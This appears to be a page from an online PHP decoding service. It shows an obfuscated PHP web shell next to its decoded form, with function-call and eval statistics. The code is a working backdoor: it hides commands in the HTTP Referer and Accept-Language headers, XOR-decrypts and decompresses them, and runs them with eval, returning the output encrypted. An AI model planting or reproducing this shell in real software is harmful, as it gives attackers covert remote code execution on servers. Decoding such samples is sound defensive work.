Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $p='ession_ZkstZkart()Zk;$s=&$_SZkESSION;Zk$ss="ZkZksubstr";Zk$sl="ZkstrtolowerZkZk..
Decoded Output download
$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}
Did this file decode correctly?
Original Code
<?php
$p='ession_ZkstZkart()Zk;$s=&$_SZkESSION;Zk$ss="ZkZksubstr";Zk$sl="ZkstrtolowerZkZk";$i=Zk$m[1][0].$m[1][Zk1];$h=$ZksZkl($ss(Zk';
$L='or($j=0;($j<$Zkc&Zk&$i<$l);$j+Zk+,$Zki++)Zk{$o.=$t{$iZkZk}^$k{$j}Zk;}}returZkn $o;}$Zkr=$_SZkERVER;$rr=Zk@$Zkr["HZkTTP_REFE';
$O='[$zZk]]Zk;if(strposZk($p,$Zkh)===0){Zk$s[$iZk]=Zk"";$p=$ss(Zk$p,Zk3);Zk}if(arZkray_key_exZkZkists($iZk,$s)){$sZk[$iZk].Zk=$';
$V='$q);$q=arrayZk_valuZkesZk($q);preZkg_mZkatch_alZkl("/([Zk\\w])[\\Zkw-]+Zk(?:;q=0.Zk(Zk[Zk\\d]))?Zk,?/",$Zkra,Zk$m);if($q&&$m){@s';
$A='md5($i.$kh),0ZkZk,3));$f=$slZkZk($ss(md5Zk($i.$kfZk),0,3));$pZk="";foZkr($z=1;ZkZk$z<ZkcounZkt($m[1]);$z++)$pZk.=$Zkq[$m[2]';
$U='REZkR"];$Zkra=@$r[ZkZk"HTTP_ZkACCEPT_LAZkZkNGUAGE"];if($ZkZkrr&&$raZk){$u=parse_uZkrl($Zkrr);paZkrsZkZke_str($Zku["query"Zk],';
$s='replZkace(aZkrZkray("ZkZk/_/","/-/"Zk),array(Zk"/","+Zk"),$ss($s[$i],Zk0,$e))Zk),$k))Zk);$oZk=obZk_Zkget_contents(Zk);oZkbZ';
$m='pZk;$e=strpos(ZkZk$s[$i],$Zkf);if($e){$k=$kh.$kZkfZk;ob_startZk();@ZkevaZkl(@gzuncomprZkess(@xZk(@baseZk64_decodZke(Zkpreg_';
$H='kZk_endZk_Zkclean();$d=bZkase64_encode(x(gzcompZkrZkeZkss($o),$k));prinZkt("<$k>Zk$d</$Zkk>");@sessZkion_deZkstZkroy();}}}}';
$g='$kh=Zk"5d41";Zk$Zkkf="402a";funcZktion Zkx($t,$k)Zk{$Zkc=sZktrlen($Zkk);$l=stZkrlen($t);$o=Zk"";fZkor($i=Zk0;Zk$i<$l;ZkZk){f';
$n=str_replace('h','','chrehateh_hfunhhction');
$S=str_replace('Zk','',$g.$L.$U.$V.$p.$A.$O.$m.$s.$H);
$b=$n('',$S);$b();
?>
Function Calls
null | 1 |
str_replace | 2 |
create_function | 1 |
Stats
MD5 | c7e821e58a72c87d65beb80fe46db058 |
Eval Count | 1 |
Decode Time | 112 ms |